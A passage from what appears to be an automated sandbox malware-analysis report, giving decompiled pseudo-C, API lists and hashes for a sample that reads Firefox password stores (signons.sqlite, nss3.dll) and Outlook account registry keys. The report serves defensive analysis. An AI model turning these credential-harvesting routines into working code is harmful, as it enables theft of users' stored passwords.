                                                              					if(_t21 > 0) {
                                                              						_t21 = E00407EC3(_t28,  &_v4104);
                                                              					}
                                                              					_t28 = _t28 + 1;
                                                              				} while (_t28 <= 0xffff);
                                                              				 *0x4171b8 = 0;
                                                              				return _t21;
                                                              			}








                                                              0x0040827a
                                                              0x00408282
                                                              0x00408292
                                                              0x004082a2
                                                              0x004082b2
                                                              0x004082bd
                                                              0x004082d8
                                                              0x004082e2
                                                              0x004082ea
                                                              0x004082f5
                                                              0x004082ff
                                                              0x00408306
                                                              0x0040830e
                                                              0x0040831a
                                                              0x00408322
                                                              0x0040832c
                                                              0x00408332
                                                              0x00408333
                                                              0x00408334
                                                              0x0040833e
                                                              0x00408347

                                                              APIs
                                                              • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 00408292
                                                              • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082A2
                                                                • Part of subcall function 00407E55: memset.MSVCRT ref: 00407E7A
                                                                • Part of subcall function 00407E55: GetPrivateProfileStringA.KERNEL32(004172C0,00000104,00412466,?,00001000,004171B8), ref: 00407E9E
                                                                • Part of subcall function 00407E55: WritePrivateProfileStringA.KERNEL32(004172C0,?,?,004171B8), ref: 00407EB5
                                                              • EnumResourceNamesA.KERNEL32 ref: 004082D8
                                                              • EnumResourceNamesA.KERNEL32 ref: 004082E2
                                                              • strcpy.MSVCRT(004172C0,strings,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082EA
                                                              • memset.MSVCRT ref: 00408306
                                                              • LoadStringA.USER32 ref: 0040831A
                                                                • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                              • String ID: TranslatorName$TranslatorURL$general$strings
                                                              • API String ID: 1060401815-3647959541
                                                              • Opcode ID: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                              • Instruction ID: d5eae57ffc3fdd8f11c9b4c351fac369e1a37aafa95eb04bb89d09d1e585c4c7
                                                              • Opcode Fuzzy Hash: acaf4a6ca7367b184f6fdf17ade1074e09c73fb74d797c334c49b365d943b025
                                                              • Instruction Fuzzy Hash: 6E1104319802543AD7212B56DC06FCB3E6DCF85B59F1040BBB708B6191C9BC9EC087AD
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 83%
                                                              			E0040D1EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
                                                              				void _v267;
                                                              				char _v268;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t31;
                                                              				int _t40;
                                                              				void* _t44;
                                                              				void* _t49;
                                                              				char* _t50;
                                                              				void* _t57;
                                                              				int _t62;
                                                              				char* _t68;
                                                              				void* _t70;
                                                              				void* _t73;
                                                              				void* _t74;
                                                              				intOrPtr* _t86;
                                                              				char* _t89;
                                                              				void* _t90;
                                                              				char** _t91;
                                                              
                                                              				_t86 = __eax;
                                                              				_t31 = E00406C2F(__eax + 0x1c, __eax, __eflags, _a4);
                                                              				_t94 = _t31;
                                                              				if(_t31 == 0) {
                                                              					__eflags = 0;
                                                              					return 0;
                                                              				}
                                                              				E0040462E(_t86 + 0x468);
                                                              				_t68 = _t86 + 0x158;
                                                              				E004061FF(_t68, _a4);
                                                              				_t89 = _t86 + 0x25d;
                                                              				 *_t89 = 0;
                                                              				E0040C530(_t94, _t86 + 0x18);
                                                              				if( *_t89 == 0) {
                                                              					_t62 = strlen(_t68);
                                                              					 *_t91 = "signons.txt";
                                                              					_t9 = strlen(??) + 1; // 0x1
                                                              					if(_t62 + _t9 >= 0x104) {
                                                              						 *_t89 = 0;
                                                              					} else {
                                                              						E004062AD(_t89, _t86 + 0x158, "signons.txt");
                                                              					}
                                                              				}
                                                              				_v268 = 0;
                                                              				memset( &_v267, 0, 0x104);
                                                              				_t40 = strlen(_t86 + 0x158);
                                                              				_t91[3] = "signons.sqlite";
                                                              				_t15 = strlen(??) + 1; // 0x1
                                                              				_pop(_t73);
                                                              				if(_t40 + _t15 >= 0x104) {
                                                              					_v268 = 0;
                                                              				} else {
                                                              					E004062AD( &_v268, _t86 + 0x158, "signons.sqlite");
                                                              					_pop(_t73);
                                                              				}
                                                              				_t98 =  *_t89;
                                                              				if( *_t89 != 0) {
                                                              					_t57 = E00406C2F(_t86 + 4, _t86, _t98, _t89);
                                                              					_t99 = _t57;
                                                              					if(_t57 != 0) {
                                                              						E0040C475(_t73, _t86, _t99);
                                                              					}
                                                              				}
                                                              				_t44 = E0040614B( &_v268);
                                                              				_t100 = _t44;
                                                              				_pop(_t74);
                                                              				if(_t44 != 0) {
                                                              					E0040CE28(_t74, _t100, _t86,  &_v268);
                                                              				}
                                                              				_t70 = 0;
                                                              				if( *((intOrPtr*)(_t86 + 0x474)) <= 0) {
                                                              					L19:
                                                              					return 1;
                                                              				} else {
                                                              					do {
                                                              						_t90 = E0040D438(_t70, _t86 + 0x468);
                                                              						_t24 = _t90 + 0x504; // 0x504
                                                              						_t49 = _t24;
                                                              						_push("none");
                                                              						_push(_t49);
                                                              						L004115B2();
                                                              						if(_t49 != 0) {
                                                              							_t25 = _t90 + 4; // 0x4
                                                              							_t50 = _t25;
                                                              							if( *_t50 == 0) {
                                                              								_t26 = _t90 + 0x204; // 0x204
                                                              								strcpy(_t50, _t26);
                                                              							}
                                                              							 *((intOrPtr*)( *_t86 + 4))(_t90);
                                                              						}
                                                              						_t70 = _t70 + 1;
                                                              					} while (_t70 <  *((intOrPtr*)(_t86 + 0x474)));
                                                              					goto L19;
                                                              				}
                                                              			}






















                                                              0x0040d1fb
                                                              0x0040d200
                                                              0x0040d205
                                                              0x0040d207
                                                              0x0040d371
                                                              0x00000000
                                                              0x0040d371
                                                              0x0040d213
                                                              0x0040d21b
                                                              0x0040d223
                                                              0x0040d22c
                                                              0x0040d233
                                                              0x0040d236
                                                              0x0040d23e
                                                              0x0040d241
                                                              0x0040d248
                                                              0x0040d254
                                                              0x0040d25e
                                                              0x0040d277
                                                              0x0040d260
                                                              0x0040d26e
                                                              0x0040d274
                                                              0x0040d25e
                                                              0x0040d288
                                                              0x0040d28f
                                                              0x0040d29e
                                                              0x0040d2a5
                                                              0x0040d2b1
                                                              0x0040d2ba
                                                              0x0040d2bb
                                                              0x0040d2d8
                                                              0x0040d2bd
                                                              0x0040d2cf
                                                              0x0040d2d5
                                                              0x0040d2d5
                                                              0x0040d2df
                                                              0x0040d2e2
                                                              0x0040d2e8
                                                              0x0040d2ed
                                                              0x0040d2ef
                                                              0x0040d2f1
                                                              0x0040d2f1
                                                              0x0040d2ef
                                                              0x0040d2fd
                                                              0x0040d302
                                                              0x0040d304
                                                              0x0040d305
                                                              0x0040d30f
                                                              0x0040d30f
                                                              0x0040d314
                                                              0x0040d31c
                                                              0x0040d36c
                                                              0x00000000
                                                              0x0040d31e
                                                              0x0040d31e
                                                              0x0040d32b
                                                              0x0040d32d
                                                              0x0040d32d
                                                              0x0040d333
                                                              0x0040d338
                                                              0x0040d339
                                                              0x0040d342
                                                              0x0040d344
                                                              0x0040d344
                                                              0x0040d34a
                                                              0x0040d34c
                                                              0x0040d354
                                                              0x0040d35a
                                                              0x0040d360
                                                              0x0040d360
                                                              0x0040d363
                                                              0x0040d364
                                                              0x00000000
                                                              0x0040d31e

                                                              APIs
                                                                • Part of subcall function 00406C2F: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D205,?,?,?,?), ref: 00406C48
                                                                • Part of subcall function 00406C2F: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406C74
                                                                • Part of subcall function 0040462E: free.MSVCRT(00000000,0040BC35), ref: 00404635
                                                                • Part of subcall function 004061FF: strcpy.MSVCRT(?,?,0040D228,?,?,?,?,?), ref: 00406204
                                                                • Part of subcall function 004061FF: strrchr.MSVCRT ref: 0040620C
                                                                • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C551
                                                                • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C565
                                                                • Part of subcall function 0040C530: memset.MSVCRT ref: 0040C579
                                                                • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C646
                                                                • Part of subcall function 0040C530: memcpy.MSVCRT ref: 0040C6A6
                                                              • strlen.MSVCRT ref: 0040D241
                                                              • strlen.MSVCRT ref: 0040D24F
                                                                • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                              • memset.MSVCRT ref: 0040D28F
                                                              • strlen.MSVCRT ref: 0040D29E
                                                              • strlen.MSVCRT ref: 0040D2AC
                                                              • _stricmp.MSVCRT(00000504,none,?,?,?), ref: 0040D339
                                                              • strcpy.MSVCRT(00000004,00000204,?,?,?), ref: 0040D354
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memsetstrlen$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
                                                              • String ID: none$signons.sqlite$signons.txt
                                                              • API String ID: 2681923396-1088577317
                                                              • Opcode ID: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                              • Instruction ID: 747294efef189d2a86bae337d02489a359e47e35f4212505bb9232dde5c11721
                                                              • Opcode Fuzzy Hash: 320e3f5b2275387b9dd69f73878994cc1174bc0b0e146de94454896ca0fe85a1
                                                              • Instruction Fuzzy Hash: 3041E3B1508246AAD710EBB1CC81BDAB798AF40305F10057FE596E21C2EB7CE9C9876D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00402C44(void* __ecx, void* __fp0, intOrPtr _a4) {
                                                              				void* _v8;
                                                              				int _v12;
                                                              				char _v16;
                                                              				char _v20;
                                                              				void _v275;
                                                              				char _v276;
                                                              				void _v1299;
                                                              				char _v1300;
                                                              				void* __esi;
                                                              				void* _t35;
                                                              				intOrPtr _t36;
                                                              				void* _t40;
                                                              				void* _t52;
                                                              				void* _t58;
                                                              				void* _t60;
                                                              				void* _t64;
                                                              				char* _t66;
                                                              				void* _t73;
                                                              				void* _t74;
                                                              				void* _t75;
                                                              				void* _t76;
                                                              				void* _t77;
                                                              				void* _t83;
                                                              
                                                              				_t83 = __fp0;
                                                              				_t64 = __ecx;
                                                              				_t35 = E0040EB3F(0x80000001, "Identities",  &_v8);
                                                              				_t74 = _t73 + 0xc;
                                                              				if(_t35 == 0) {
                                                              					_v12 = 0;
                                                              					_v276 = 0;
                                                              					memset( &_v275, 0, 0xff);
                                                              					_t40 = E0040EC05(_v8, 0,  &_v276);
                                                              					_t75 = _t74 + 0x18;
                                                              					if(_t40 == 0) {
                                                              						_t66 = "%s\\%s";
                                                              						do {
                                                              							_t69 = _a4;
                                                              							E0040EBC1(_t64, _v8,  &_v276, "Username", _a4 + 0xa9c, 0x7f);
                                                              							_v1300 = 0;
                                                              							memset( &_v1299, 0, 0x3ff);
                                                              							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Internet Account Manager\\Accounts");
                                                              							_t52 = E0040EB3F(_v8,  &_v1300,  &_v16);
                                                              							_t76 = _t75 + 0x3c;
                                                              							_t80 = _t52;
                                                              							if(_t52 == 0) {
                                                              								E00402BB8(_t64,  &_v16, _t80, _t83, _t69, 1);
                                                              							}
                                                              							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts");
                                                              							_t58 = E0040EB3F(_v8,  &_v1300,  &_v20);
                                                              							_t77 = _t76 + 0x1c;
                                                              							_t81 = _t58;
                                                              							if(_t58 == 0) {
                                                              								E00402BB8(_t64,  &_v20, _t81, _t83, _a4, 5);
                                                              							}
                                                              							_v12 = _v12 + 1;
                                                              							_t60 = E0040EC05(_v8, _v12,  &_v276);
                                                              							_t75 = _t77 + 0xc;
                                                              						} while (_t60 == 0);
                                                              					}
                                                              					RegCloseKey(_v8);
                                                              				}
                                                              				_t36 = _a4;
                                                              				 *((char*)(_t36 + 0xa9c)) = 0;
                                                              				return _t36;
                                                              			}


























                                                              0x00402c44
                                                              0x00402c44
                                                              0x00402c5c
                                                              0x00402c61
                                                              0x00402c68
                                                              0x00402c7b
                                                              0x00402c7e
                                                              0x00402c84
                                                              0x00402c94
                                                              0x00402c99
                                                              0x00402c9e
                                                              0x00402ca6
                                                              0x00402cab
                                                              0x00402cab
                                                              0x00402cc6
                                                              0x00402cd8
                                                              0x00402cde
                                                              0x00402cf7
                                                              0x00402d0a
                                                              0x00402d0f
                                                              0x00402d12
                                                              0x00402d14
                                                              0x00402d1c
                                                              0x00402d1c
                                                              0x00402d35
                                                              0x00402d48
                                                              0x00402d4d
                                                              0x00402d50
                                                              0x00402d52
                                                              0x00402d5c
                                                              0x00402d5c
                                                              0x00402d61
                                                              0x00402d71
                                                              0x00402d76
                                                              0x00402d79
                                                              0x00402d82
                                                              0x00402d86
                                                              0x00402d86
                                                              0x00402d8c
                                                              0x00402d8f
                                                              0x00402d97

                                                              APIs
                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                              • memset.MSVCRT ref: 00402C84
                                                                • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                              • RegCloseKey.ADVAPI32(?), ref: 00402D86
                                                                • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                              • memset.MSVCRT ref: 00402CDE
                                                              • sprintf.MSVCRT ref: 00402CF7
                                                              • sprintf.MSVCRT ref: 00402D35
                                                                • Part of subcall function 00402BB8: memset.MSVCRT ref: 00402BD8
                                                                • Part of subcall function 00402BB8: RegCloseKey.ADVAPI32 ref: 00402C3C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Closememset$sprintf$EnumOpen
                                                              • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                              • API String ID: 1831126014-3814494228
                                                              • Opcode ID: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                              • Instruction ID: 6c0256c292ffb55b53f7a2730c4bcad7d13cefd93b753116a94389aae211c0df
                                                              • Opcode Fuzzy Hash: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
                                                              • Instruction Fuzzy Hash: 25315C72D0011DBADB11EA96CD46EEFB77CAF04344F0405BABA19F2091E6B49F988F54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E0040B53C(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                                              				void* _v8;
                                                              				intOrPtr _v20;
                                                              				void* _v24;
                                                              				void* _v28;
                                                              				void* __ebx;
                                                              				void* __esi;
                                                              				signed int _t45;
                                                              				intOrPtr _t50;
                                                              				signed int _t53;
                                                              				intOrPtr _t82;
                                                              				signed char _t86;
                                                              				intOrPtr _t88;
                                                              				intOrPtr _t90;
                                                              				void* _t91;
                                                              				void* _t92;
                                                              
                                                              				_t84 = __ecx;
                                                              				_t88 = _a4;
                                                              				_t92 = _t88 - 0x402;
                                                              				_t91 = __ecx;
                                                              				if(_t92 > 0) {
                                                              					_t45 = _t88 - 0x415;
                                                              					__eflags = _t45;
                                                              					if(_t45 == 0) {
                                                              						E0040A4C8(__ecx);
                                                              						L22:
                                                              						__eflags = 0;
                                                              						E0040A27F(0, _t84, _t91, 0);
                                                              						L23:
                                                              						if(_t88 ==  *((intOrPtr*)(_t91 + 0x374))) {
                                                              							_t81 = _a12;
                                                              							_t86 =  *(_a12 + 0xc);
                                                              							_t50 =  *((intOrPtr*)(_t91 + 0x370));
                                                              							if((_t86 & 0x00000008) == 0) {
                                                              								__eflags = _t86 & 0x00000040;
                                                              								if((_t86 & 0x00000040) != 0) {
                                                              									 *0x4171ac =  *0x4171ac & 0x00000000;
                                                              									__eflags =  *0x4171ac;
                                                              									SetFocus( *(_t50 + 0x184));
                                                              								}
                                                              							} else {
                                                              								E00409D7E(_t50, _t81);
                                                              							}
                                                              						}
                                                              						return E004019AC(_t91, _t88, _a8, _a12);
                                                              					}
                                                              					_t53 = _t45 - 1;
                                                              					__eflags = _t53;
                                                              					if(_t53 == 0) {
                                                              						E0040A56C(__ecx);
                                                              						goto L22;
                                                              					}
                                                              					__eflags = _t53 == 6;
                                                              					if(_t53 == 6) {
                                                              						SetFocus( *(__ecx + 0x378));
                                                              					}
                                                              					goto L23;
                                                              				}
                                                              				if(_t92 == 0) {
                                                              					 *(__ecx + 0x25c) =  *(__ecx + 0x25c) & 0x00000000;
                                                              					E0040A437(__ecx);
                                                              					goto L22;
                                                              				}
                                                              				if(_t88 == 0x1c) {
                                                              					__eflags = _a8;
                                                              					if(_a8 == 0) {
                                                              						 *((intOrPtr*)(_t91 + 0x378)) = GetFocus();
                                                              					} else {
                                                              						PostMessageA( *(__ecx + 0x108), 0x41c, 0, 0);
                                                              					}
                                                              					goto L23;
                                                              				}
                                                              				if(_t88 == 0x20) {
                                                              					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
                                                              					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
                                                              						goto L23;
                                                              					}
                                                              					SetCursor(LoadCursorA( *0x416b94, 0x67));
                                                              					return 1;
                                                              				}
                                                              				if(_t88 == 0x2b) {
                                                              					_t82 = _a12;
                                                              					__eflags =  *((intOrPtr*)(_t82 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
                                                              					if( *((intOrPtr*)(_t82 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
                                                              						SetBkMode( *(_t82 + 0x18), 1);
                                                              						SetTextColor( *(_t82 + 0x18), 0xff0000);
                                                              						_v8 = SelectObject( *(_t82 + 0x18),  *(__ecx + 0x258));
                                                              						asm("stosd");
                                                              						asm("stosd");
                                                              						asm("stosd");
                                                              						asm("stosd");
                                                              						_t90 = _a12;
                                                              						_v28 = 0x14;
                                                              						_v20 = 5;
                                                              						DrawTextExA( *(_t90 + 0x18), __ecx + 0x158, 0xffffffff, _t90 + 0x1c, 4,  &_v28);
                                                              						SelectObject( *(_t90 + 0x18), _v8);
                                                              						_t88 = _a4;
                                                              					}
                                                              				} else {
                                                              					if(_t88 == 0x7b) {
                                                              						_t87 = _a8;
                                                              						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)) + 0x184))) {
                                                              							E0040B372(__ecx, _t87);
                                                              						}
                                                              					}
                                                              				}
                                                              				goto L23;
                                                              			}


















                                                              0x0040b53c
                                                              0x0040b545
                                                              0x0040b54d
                                                              0x0040b54f
                                                              0x0040b551
                                                              0x0040b689
                                                              0x0040b689
                                                              0x0040b68e
                                                              0x0040b6b1
                                                              0x0040b6b6
                                                              0x0040b6b6
                                                              0x0040b6b8
                                                              0x0040b6bd
                                                              0x0040b6c3
                                                              0x0040b6c5
                                                              0x0040b6c8
                                                              0x0040b6ce
                                                              0x0040b6d4
                                                              0x0040b6dd
                                                              0x0040b6e0
                                                              0x0040b6e8
                                                              0x0040b6e8
                                                              0x0040b6ef
                                                              0x0040b6ef
                                                              0x0040b6d6
                                                              0x0040b6d6
                                                              0x0040b6d6
                                                              0x0040b6d4
                                                              0x00000000
                                                              0x0040b6fe
                                                              0x0040b690
                                                              0x0040b690
                                                              0x0040b691
                                                              0x0040b6a8
                                                              0x00000000
                                                              0x0040b6a8
                                                              0x0040b693
                                                              0x0040b696
                                                              0x0040b69e
                                                              0x0040b69e
                                                              0x00000000
                                                              0x0040b696
                                                              0x0040b557
                                                              0x0040b679
                                                              0x0040b680
                                                              0x00000000
                                                              0x0040b680
                                                              0x0040b560
                                                              0x0040b651
                                                              0x0040b654
                                                              0x0040b671
                                                              0x0040b656
                                                              0x0040b663
                                                              0x0040b663
                                                              0x00000000
                                                              0x0040b654
                                                              0x0040b569
                                                              0x0040b626
                                                              0x0040b62c
                                                              0x00000000
                                                              0x00000000
                                                              0x0040b641
                                                              0x00000000
                                                              0x0040b649
                                                              0x0040b572
                                                              0x0040b59e
                                                              0x0040b5a4
                                                              0x0040b5aa
                                                              0x0040b5b5
                                                              0x0040b5c3
                                                              0x0040b5da
                                                              0x0040b5e2
                                                              0x0040b5e3
                                                              0x0040b5e4
                                                              0x0040b5e5
                                                              0x0040b5e6
                                                              0x0040b5ff
                                                              0x0040b606
                                                              0x0040b60d
                                                              0x0040b619
                                                              0x0040b61b
                                                              0x0040b61b
                                                              0x0040b574
                                                              0x0040b577
                                                              0x0040b583
                                                              0x0040b58c
                                                              0x0040b594
                                                              0x0040b594
                                                              0x0040b58c
                                                              0x0040b577
                                                              0x00000000

                                                              APIs
                                                              • SetBkMode.GDI32(?,00000001), ref: 0040B5B5
                                                              • SetTextColor.GDI32(?,00FF0000), ref: 0040B5C3
                                                              • SelectObject.GDI32(?,?), ref: 0040B5D8
                                                              • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B60D
                                                              • SelectObject.GDI32(00000014,?), ref: 0040B619
                                                                • Part of subcall function 0040B372: GetCursorPos.USER32(?), ref: 0040B37F
                                                                • Part of subcall function 0040B372: GetSubMenu.USER32 ref: 0040B38D
                                                                • Part of subcall function 0040B372: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B3BA
                                                              • LoadCursorA.USER32 ref: 0040B63A
                                                              • SetCursor.USER32(00000000), ref: 0040B641
                                                              • PostMessageA.USER32 ref: 0040B663
                                                              • SetFocus.USER32(?), ref: 0040B69E
                                                              • SetFocus.USER32(?), ref: 0040B6EF
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                              • String ID:
                                                              • API String ID: 1416211542-0
                                                              • Opcode ID: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                              • Instruction ID: 8f05fcf81e8b57b2917fe7890bba9475612e1218cdf4c3fdd04c744704700eb5
                                                              • Opcode Fuzzy Hash: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                              • Instruction Fuzzy Hash: E741A271100605EFCB119F64CD89EEE7775FB08300F104936E615A62A1CB799D91DBDE
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00405FC6(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                              				long _v8;
                                                              				void* _v12;
                                                              				long _v16;
                                                              				void* _t14;
                                                              				void* _t29;
                                                              				void* _t34;
                                                              				long _t36;
                                                              
                                                              				_v8 = _v8 & 0x00000000;
                                                              				EmptyClipboard();
                                                              				_t14 = E00405ECB(_a4);
                                                              				_v12 = _t14;
                                                              				if(_t14 == 0xffffffff) {
                                                              					_v8 = GetLastError();
                                                              				} else {
                                                              					_t36 = GetFileSize(_t14, 0);
                                                              					_t5 = _t36 + 1; // 0x1
                                                              					_t29 = GlobalAlloc(0x2000, _t5);
                                                              					if(_t29 == 0) {
                                                              						L4:
                                                              						_v8 = GetLastError();
                                                              					} else {
                                                              						_t34 = GlobalLock(_t29);
                                                              						if(ReadFile(_v12, _t34, _t36,  &_v16, 0) == 0) {
                                                              							goto L4;
                                                              						} else {
                                                              							 *((char*)(_t34 + _t36)) = 0;
                                                              							GlobalUnlock(_t29);
                                                              							SetClipboardData(1, _t29);
                                                              						}
                                                              					}
                                                              					CloseHandle(_v12);
                                                              				}
                                                              				CloseClipboard();
                                                              				return _v8;
                                                              			}










                                                              0x00405fcc
                                                              0x00405fd0
                                                              0x00405fd9
                                                              0x00405fe2
                                                              0x00405fe5
                                                              0x0040605b
                                                              0x00405fe7
                                                              0x00405ff3
                                                              0x00405ff5
                                                              0x00406004
                                                              0x00406008
                                                              0x0040603e
                                                              0x00406044
                                                              0x0040600a
                                                              0x00406013
                                                              0x00406026
                                                              0x00000000
                                                              0x00406028
                                                              0x00406029
                                                              0x0040602d
                                                              0x00406036
                                                              0x00406036
                                                              0x00406026
                                                              0x0040604a
                                                              0x00406052
                                                              0x0040605e
                                                              0x00406068

                                                              APIs
                                                              • EmptyClipboard.USER32 ref: 00405FD0
                                                                • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00405FED
                                                              • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00405FFE
                                                              • GlobalLock.KERNEL32 ref: 0040600B
                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040601E
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040602D
                                                              • SetClipboardData.USER32 ref: 00406036
                                                              • GetLastError.KERNEL32 ref: 0040603E
                                                              • CloseHandle.KERNEL32(?), ref: 0040604A
                                                              • GetLastError.KERNEL32 ref: 00406055
                                                              • CloseClipboard.USER32 ref: 0040605E
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                              • String ID:
                                                              • API String ID: 3604893535-0
                                                              • Opcode ID: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
                                                              • Instruction ID: 732aa9399b2cd23c9d945101f46e029b0eae2bee8c87a14991e63b5ea8a72c25
                                                              • Opcode Fuzzy Hash: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
                                                              • Instruction Fuzzy Hash: 6A113371900205FBDB109BB4DE4DBDE7F78EB08351F118176F606E1190DBB48A20DB69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • strcpy.MSVCRT(?,Common Programs,0040EEF9,?,?,?,?,?,00000104), ref: 0040EE4E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strcpy
                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                              • API String ID: 3177657795-318151290
                                                              • Opcode ID: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                              • Instruction ID: 838bbb5fcb7671a25bd4d31fd75230584a1d4f3c41bb848f6a939ae912ddcdf8
                                                              • Opcode Fuzzy Hash: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                              • Instruction Fuzzy Hash: 66F0BDB32A878EF0D429496BCD4AEB744429151B46B7C4D37A002B46D5E87D8AF260DF
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 74%
                                                              			E0040765B(void* __eflags, intOrPtr* _a4) {
                                                              				char _v532;
                                                              				short _v534;
                                                              				void _v1042;
                                                              				void _v1044;
                                                              				long _v1080;
                                                              				intOrPtr _v1084;
                                                              				intOrPtr _v1088;
                                                              				intOrPtr _v1096;
                                                              				int _v1104;
                                                              				char _v1108;
                                                              				intOrPtr _v1112;
